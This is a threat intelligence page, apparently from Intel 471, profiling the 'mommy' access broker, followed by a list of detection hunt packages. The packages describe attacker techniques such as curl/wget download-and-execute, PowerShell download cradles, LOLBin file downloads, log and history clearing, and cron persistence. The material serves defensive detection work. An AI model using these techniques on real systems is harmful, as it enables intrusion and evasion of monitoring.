mommy Access Broker | Intel 471 Skip to content

mommy Access Broker

Jun 27, 2025
Homepage slide 1

Threat Overview - mommy Access Broker

mommy, also known as "Miyako" or "Miya," is an emerging and sophisticated cyber threat actor that has gained attention since 2024 due to their advanced cyber-espionage capabilities and active involvement in high-profile attacks. Operating within underground cybercrime markets, mommy specializes in providing illicit services, including access to compromised networks and the sale of sensitive data. Their activities indicate a focus on espionage, data exfiltration, and exploiting high-value targets, particularly government entities, telecommunications companies, and critical infrastructure providers.

The threat group has been observed selling unauthorized access to networks and systems, enabling other threat actors to opportunistically access compromised devices for further exploitation or to deploy malicious payloads. The access broker has targeted a range of industries, including government institutions in the United States, critical infrastructure providers, and telecommunications. With a particular focus on monetizing stolen access and information, the access broker is a part of a growing trend of "access-as-a-service" models, where cybercriminals commodify network access for profit. These activities point to the increasing commercialization of cybercrime, where stolen credentials and system vulnerabilities are sold to the highest bidder, often nation-state actors. Additionally, with a focus on maintaining anonymity and privacy in their operations, it is a significant challenge for cybersecurity efforts and makes them a formidable threat to organizations worldwide.

In January 2025, a copy of the access broker’s "Guide", previously offered for sale, was uploaded to VirusTotal. The guide outlines detailed methodologies for conducting intrusions, maintaining persistence, expanding initial footholds, and monetizing compromised access and data. Intel 471’s TITAN reporting, cited in the "Intel 471 References" section below, provides invaluable insights into the access broker’s activities, affiliations, and operational links to other groups, often surfacing intelligence well before any public leaks or reporting. This advanced visibility ensures greater preparedness and a deeper understanding of how the broker operates within the broader cybercriminal ecosystem.

Mommy Access Broker Hunt Package Collection

 

TITAN References:

Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!

Related Hunt Packages

CURL/WGET Download and Execute - Potential Payload Download Followed by Execution

This Threat Hunt package identifies the use of curl or wget followed by the potential execution of the downloaded payload via a scripting interpreter, such as Bash, Python, Perl, or others.
ACCESS HUNT PACKAGE

Desktopimgdownldr LOLBin - Download File 

This use case is meant to identify desktopimgdownldr.exe, a binary which is meant to be used to customize the lock screen or desktop background images, downloading files remotely.
ACCESS HUNT PACKAGE

Common Suspicious Powershell Execution Argument Techniques - Bypass and Unrestricted Policies

This Hunt Package is designed to identify suspicious PowerShell execution arguments associated with execution policies "Unrestricted" and "Bypass". Based on research, the method of utilizing "Bypass" is more common in malicious executions, however "Unrestricted" should still be monitored for abuse, such as insider threats. As such, a behavior and detection have been provided in this Hunt Package based on the likelihood of the number of executions between Bypass and Unrestricted. The included flags and parameters in the query logic search for potentially malicious activities that may deviate from standard practices within a specific environment. This can help the analyst discover abnormal or harmful events that are leveraging PowerShell for various purposes, such as launching attacks or maintaining persistence.
ACCESS HUNT PACKAGE

CronJobs Pointed at Hidden Directories - Linux

This identifies Cron Jobs utilizing hidden locations to store scripts and executables commonly used for persistence on Linux machines.
ACCESS HUNT PACKAGE

hh.exe LOLBin - Download File

This use case is meant to identify the HTML Help executable program (hh.exe) downloading files remotely.
ACCESS HUNT PACKAGE

PowerShell History Modification or Deletion

Adversaries may attempt to clear the command history of compromised hosts to conceal the actions that they have performed during an attack. This content will detect if PowerShell's history was cleared, disabled, or modified.
ACCESS HUNT PACKAGE

Living Off The Land Technique - Esentutl.exe

This package is designed when the Microsoft Windows native binary esentutl.exe is used to perform actions that may be abnormal and possibly malicious.
ACCESS HUNT PACKAGE

Usage of chmod to Enable Execution - Potential Payload Staging

This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically focusing on changes that grant executable rights. By correlating these events with user contexts and known file paths, the package aims to highlight potentially malicious activities, such as the preparation of a system for exploitation or the setup of persistence mechanisms by unauthorized users.
ACCESS HUNT PACKAGE

sshd Process Executing Commands as root User - Potential Abuse or RCE

This Hunt Package looks for bash or shell commands being executed as part of the sshd process. Commands are typically associated with a specific user when logged in via ssh, however when the sshd process is exploited or otherwise abused, it can present as the user of a process executing code from the exploit attempt. This process chain was most recently observed during staged exploitation of CVE-2024-3094. This Hunt Package covers the believed process tree based on a staged exploit for the vulnerability in XZ, tracked as CVE-2024-3094, released by GitHub user "amlweems".
ACCESS HUNT PACKAGE

Methods for Downloading Files with PowerShell

This threat hunt package identifies instances where PowerShell is being used to download files from external sources, a common technique used in malware delivery and lateral movement. The hunt examines various methods by which PowerShell can be leveraged for file downloads, including the use of cmdlets such as Invoke-WebRequest (iwr), Invoke-RestMethod (irm), and Start-BitsTransfer (sbt), as well as direct utilization of .NET classes like System.Net.WebClient and HttpClient. The package also checks for potentially suspicious use of aliases (curl, wget) and other common executables that invoke PowerShell scripts to download malicious payloads.
ACCESS HUNT PACKAGE

Wevtutil Cleared Log

This use case is designed to detect when "wevtutil" is used to clear logs to potentially obfuscate malicious events occurring prior to the clean up.
ACCESS HUNT PACKAGE

PowerShell Download and Execute Dropper Behavior - Separate Command Calls

This package identifies the use of PowerShell to pull down a payload and execute it. This is similar to activity observed in association with SysJoker's Dropper for Windows where the PowerShell commands are broken up as individual execution calls.
ACCESS HUNT PACKAGE

Microsoft SQL executing LOLBins

This package identifies when the Microsoft SQL executable runs Living Off the Land Binaries (LOLBins) which is a characteristic of a compromised Microsoft SQL Server.
ACCESS HUNT PACKAGE

Linux Command History Removal

This use case is meant to identify command-line parameters indicative of the deletion of command history on Linux. This can be done in an attempt to evade detection and erase adversarial activities.
ACCESS HUNT PACKAGE

Share this article
All Resources

Featured Content

Intel 471 Logo 2024
Webinars
Intelligence-Driven Threat Hunting Workshop: Analyzing Malware Behaviors
Adobe Stock 595371799 Editorial Use Only
Blog Articles
NATO summit commences in tandem with tense cyber, kinetic conflict
UK 2025 Threat Landscape Report Listing
Whitepapers
UK 2025 Threat Landscape Report
Intel 471 Logo 2024
News
Qilin Ransomware Adds "Call Lawyer" Feature to Pressure Victims for Larger Ransoms
Tinkerlisting
Blog Articles
A look at ‘Tinker,’ Black Basta’s phishing fixer, negotiator
Intel 471 Logo 2024
Podcasts
The Intersection of AI and Threat Hunting: What Problems Emerge, What Problems Get Solved
Featured Resource
Intel 471 Logo 2024

AresLoader is a new loader malware-as-a-service (MaaS) offered by threat actors with links to Russian hacktivism that was spotted recently in the wild.

© 2025 Intel 471  |  Privacy Policy  |  Terms of Service  |  Legal Agreements  |  Modern Slavery and Human Trafficking Statement